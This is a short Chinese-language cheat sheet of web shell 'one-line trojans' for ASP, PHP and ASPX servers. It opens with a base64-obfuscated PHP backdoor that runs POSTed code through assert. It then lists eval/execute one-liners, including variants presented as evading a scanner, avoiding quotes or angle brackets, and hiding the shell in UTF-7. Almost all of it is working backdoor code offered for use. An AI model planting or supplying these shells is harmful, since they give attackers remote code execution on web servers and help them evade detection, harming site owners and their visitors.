<?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>
常用一句话木马
asp一句话木马:
<%execute(request("value"))%>
php一句话木马:
<?php @eval($_POST[value]);?>aspx一句话木马:
<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%>其他一句话木马:
<%eval request("value")%>
<%execute request("value")%>
<%execute(request("value"))%>
<%If Request("value")<>"" Then Execute(Request("value"))%>
<%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
<SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"],"unsafe");%>
可以躲过雷客图的一句话木马:
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""value""))")
%>
不用‘<,>‘的asp一句话木马:
<script language=VBScript runat=server>execute request("value")</script>
不用双引号的一句话木马:
<%eval request(chr(35))%>UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>